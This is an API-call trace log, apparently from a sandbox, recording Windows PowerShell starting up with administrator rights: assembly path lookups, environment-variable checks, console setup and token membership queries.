	[0250.687] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0250.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.687] CoTaskMemFree (pv=0x517f40) 
	[0252.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0252.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0252.850] CoTaskMemAlloc (cb=0x104) returned 0x518050
	[0252.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.850] CoTaskMemFree (pv=0x518050) 
	[0252.852] CoTaskMemAlloc (cb=0x104) returned 0x518050
	[0252.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.852] CoTaskMemFree (pv=0x518050) 
	[0253.196] CoTaskMemAlloc (cb=0x104) returned 0x518050
	[0253.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.196] CoTaskMemFree (pv=0x518050) 
	[0253.198] CoTaskMemAlloc (cb=0x104) returned 0x518050
	[0253.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.198] CoTaskMemFree (pv=0x518050) 
	[0253.198] CoTaskMemAlloc (cb=0x104) returned 0x518050
	[0253.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.199] CoTaskMemFree (pv=0x518050) 
	[0253.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0253.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0253.954] CoTaskMemAlloc (cb=0x104) returned 0x518050
	[0253.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.954] CoTaskMemFree (pv=0x518050) 
	[0254.347] CoTaskMemAlloc (cb=0x104) returned 0x518050
	[0254.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0254.347] CoTaskMemFree (pv=0x518050) 
	[0254.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0254.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0257.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0257.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0258.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0258.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0259.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0259.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0260.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0260.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0261.285] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0261.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.285] CoTaskMemFree (pv=0x518270) 
	[0261.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0261.639] SetErrorMode (uMode=0x1) returned 0x1
	[0261.639] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26d980 | out: lpFileInformation=0x26d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0261.639] SetErrorMode (uMode=0x1) returned 0x1
	[0265.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.850] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0265.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.850] CoTaskMemFree (pv=0x518270) 
	[0265.852] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0265.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.852] CoTaskMemFree (pv=0x518270) 
	[0265.852] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0265.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.852] CoTaskMemFree (pv=0x518270) 
	[0265.855] CoCreateGuid (in: pguid=0x26dd48 | out: pguid=0x26dd48*(Data1=0x4bbf3fbb, Data2=0x5f1b, Data3=0x4b18, Data4=([0]=0x9d, [1]=0x71, [2]=0xc1, [3]=0x0, [4]=0x76, [5]=0x6, [6]=0xf, [7]=0x53))) returned 0x0
	[0265.857] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0265.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.857] CoTaskMemFree (pv=0x518270) 
	[0265.860] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0265.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.860] CoTaskMemFree (pv=0x518270) 
	[0265.862] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0265.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.862] CoTaskMemFree (pv=0x518270) 
	[0265.866] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0266.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x26d9f0 | out: lpConsoleScreenBufferInfo=0x26d9f0) returned 1
	[0266.669] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0266.669] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x26d9f0 | out: lpConsoleScreenBufferInfo=0x26d9f0) returned 1
	[0266.670] GetVersionExW (in: lpVersionInformation=0x26d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0266.672] GetCurrentProcess () returned 0xffffffffffffffff
	[0266.673] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x26da18 | out: TokenHandle=0x26da18*=0x31c) returned 1
	[0266.677] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d938 | out: TokenInformation=0x0, ReturnLength=0x26d938) returned 0
	[0266.678] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x487260
	[0266.678] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x487260, TokenInformationLength=0x4, ReturnLength=0x26d938 | out: TokenInformation=0x487260, ReturnLength=0x26d938) returned 1
	[0266.679] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26da98 | out: phNewToken=0x26da98*=0x318) returned 1
	[0266.679] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d938 | out: TokenInformation=0x0, ReturnLength=0x26d938) returned 0
	[0266.679] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x487290
	[0266.679] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x487290, TokenInformationLength=0x4, ReturnLength=0x26d938 | out: TokenInformation=0x487290, ReturnLength=0x26d938) returned 1
	[0266.680] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x2dfc368*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26daa8 | out: IsMember=0x26daa8) returned 1
	[0266.680] CloseHandle (hObject=0x318) returned 1
	[0266.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.409] CoTaskMemAlloc (cb=0x804) returned 0x1b899080
	[0267.409] GetConsoleTitleW (in: lpConsoleTitle=0x1b899080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0267.410] CoTaskMemFree (pv=0x1b899080) 
	[0267.429] CoTaskMemAlloc (cb=0x804) returned 0x1b899930
	[0267.429] GetConsoleTitleW (in: lpConsoleTitle=0x1b899930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0267.941] CoTaskMemFree (pv=0x1b899930) 
	[0267.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.943] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0269.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0269.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0269.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0269.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
